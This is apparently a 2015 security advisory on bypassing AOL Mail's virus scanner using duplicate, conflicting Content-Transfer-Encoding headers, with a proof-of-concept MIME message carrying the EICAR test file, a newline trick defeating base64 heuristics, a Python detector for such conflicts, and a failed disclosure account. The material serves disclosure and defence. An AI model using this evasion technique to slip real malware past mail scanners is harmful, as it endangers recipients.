July 2015
Please note that republishing this article in full or in part is only allowed under the conditions described here.
Bypassing AOL Mail Virus Scanning with Conflicting Content-Transfer-Encoding Headers
The virus scanner integrated in AOL Mail can be bypassed by using conflicting Content-Transfer-Encoding headers, as described in Dubious MIME - Conflicting Content-Transfer-Encoding Headers.
Proof Of Concept
The webmail interface of AOL Mail will use the first Content-Transfer-Encoding header 'base64' for
displaying the mail and for downloads. It thus provides access to the attached file 'eicar.com'
which contains the Eicar test virus.
The virus scanner instead will use the second Content-Transfer-Encoding header 'quoted-printable'
and is thus not able to detect the virus (if the headers are switched the mail will be successfully
blocked).
Note that it is necessary to put a seemingly misplaced newline inside the base64 encoding of the
virus. It looks like the virus scanner has heuristics to detect "common" base64 encoding even
if it is not explicitly declared. Adding this newline defeats these heuristics without
affecting the decoding in the webmail interface.
From: foo
To: bar
Subject: eicar - conflicting content-transfer-encoding
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary=foo

--foo
Content-type: application/octet-stream; name="eicar.com"
Content-Transfer-Encoding: base64
Content-Transfer-Encoding: quoted-printable

WD
VPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNU
LUZJTEUhJEgrSCo=
--foo--
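The following Python script is an added example and is not part of the original advisory. It parses the proof-of-concept mail above (reconstructed inline with the blank lines MIME requires), flags every leaf part that declares Content-Transfer-Encoding more than once, and decodes the payload under each declared encoding, which is what a gateway scanner must do (or else reject the part outright) to avoid seeing a different file than the mail client shows. It also records what Python's own email module hands a consumer, since get_payload(decode=True) honours only the first header, just like the webmail interface described above.

```python
import base64
import email
import quopri
from email.message import Message

# Constructed sample: the advisory's PoC mail, with the blank lines MIME requires.
# The payload is the EICAR test string, base64-encoded with the deliberate early line break.
SAMPLE = b"""From: foo
To: bar
Subject: eicar - conflicting content-transfer-encoding
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary=foo

--foo
Content-type: application/octet-stream; name="eicar.com"
Content-Transfer-Encoding: base64
Content-Transfer-Encoding: quoted-printable

WD
VPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNU
LUZJTEUhJEgrSCo=
--foo--
"""

# Decoders for the transfer encodings defined in RFC 2045; identity for the rest.
# base64.b64decode() skips non-alphabet bytes (including newlines) by default,
# which is why the inserted line break does not break the webmail's view.
DECODERS = {
    "base64": base64.b64decode,
    "quoted-printable": quopri.decodestring,
}

def decode_under(part: Message, cte: str) -> bytes:
    """Decode a leaf part's raw payload under one specific encoding name."""
    raw = part.get_payload(decode=False).encode("ascii", "surrogateescape")
    return DECODERS.get(cte.strip().lower(), lambda b: b)(raw)

def find_cte_conflicts(raw_mail: bytes) -> list:
    """Return one record per leaf part with more than one Content-Transfer-Encoding.
    A scanner should either scan every candidate decoding or reject such parts."""
    msg = email.message_from_bytes(raw_mail)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctes = part.get_all("Content-Transfer-Encoding") or []
        if len(ctes) > 1:
            findings.append({
                "filename": part.get_filename(),
                "encodings": [c.strip().lower() for c in ctes],
                "decoded": {c.strip().lower(): decode_under(part, c) for c in ctes},
                "parser_default": part.get_payload(decode=True),  # first header wins
            })
    return findings
```

Run on a mail with a single declared encoding, the function returns an empty list; on the sample it returns one record whose base64 view is the 68-byte EICAR string while the quoted-printable view is just the harmless base64 text.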
Responsible Disclosure - failed
I've tried to report the issue to AOL but was not successful. Since I did not find any contact specifically for reporting security issues, I used their generic contact form in 06/2015, pointing out that I had a security problem to report (without all the details). More than a month later I got some mail back which only contained the standard security tips but did not give me a contact where I could report the security issue:
Date: Mon, 20 Jul 2015 13:06:41 +0000 (GMT)
From: "aoldefragen@aol.com" <aoldefragen@aol.com>
Subject: DE: Contact Request [ ref:_00DF06aAH._500F0bsRQP:ref ]
...
we recommend that you observe the following security tips to protect your computer and your personal data:
- ...